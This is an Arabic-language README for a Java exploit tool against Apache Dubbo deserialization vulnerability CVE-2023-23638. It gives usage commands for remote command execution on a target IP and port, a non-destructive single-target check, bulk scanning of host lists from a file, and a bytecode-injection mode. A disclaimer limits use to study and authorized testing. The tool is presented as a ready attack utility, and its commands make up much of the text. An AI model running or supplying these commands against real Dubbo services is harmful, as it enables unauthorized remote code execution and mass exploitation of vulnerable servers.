
Apache Dubbo (CVE-2023-23638) الممارسة الهندسية لاستغلال الثغرات
ممارسة هندسية لاستغلال ثغرة Apache Dubbo (CVE-2023-23638)، تغطي عملية اكتشاف الخدمة واستغلال الثغرة وعرض النتائج في Dubbo 3.x. هذه الأداة مخصصة للبحث والدراسة فقط، ونرحب بجميع الخبراء لمناقشة وتقديم اقتراحات قيمة.
تدعم هذه الأداة الاستغلال الكامل لـ CVE-2023-23638 في Dubbo 3.x، وتغطي من اكتشاف الخدمة إلى استغلال الثغرة وعرض النتائج. يمكن استخدامها أيضًا في Dubbo 2.x، ولكن يلزم إدخال اسم الخدمة واسم الطريقة يدويًا. لقد كتبت مقالتين تحليليتين حول هذه الثغرة:
هذه الأداة مخصصة للتعلم فقط، ولم تراعِ العديد من المشكلات العملية، مثل:
سيتم تحديثها لاحقًا
لن يتم تحديث هذا المشروع مجددًا. سيتم إصدار أداة مسح واستغلال أكثر شمولاً لـ Dubbo في مشروع آخر مفتوح المصدر لاحقًا، ترقبوا!
شكرًا للخبير y4tacker لمشاركته فكرة إلغاء التسلسل الأصلي لـ fastjson
استغلال عنوان URL واحد
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
كشف غير ضار لعنوان URL واحد
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
كشف جماعي
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
حقن كود بايت

تنفيذ الأوامر

هذه الأداة مخصصة فقط لدراسة الثغرات والتعلم. إذا كنت بحاجة لاختبار قابلية استخدام الأداة، فيرجى إعداد بيئة هدف بنفسك. عند استخدام هذه الأداة للكشف، يجب عليك التأكد من أن هذا الإجراء يتوافق مع القوانين واللوائح المحلية، وأنك حصلت على التفويض الكافي. لا تقم بمسح الأهداف غير المصرح بها. إذا قمت بأي عمل غير قانوني أثناء استخدام هذه الأداة، فأنت تتحمل المسؤولية عن العواقب بنفسك، ولن نتحمل أي مسؤولية قانونية أو تضامنية.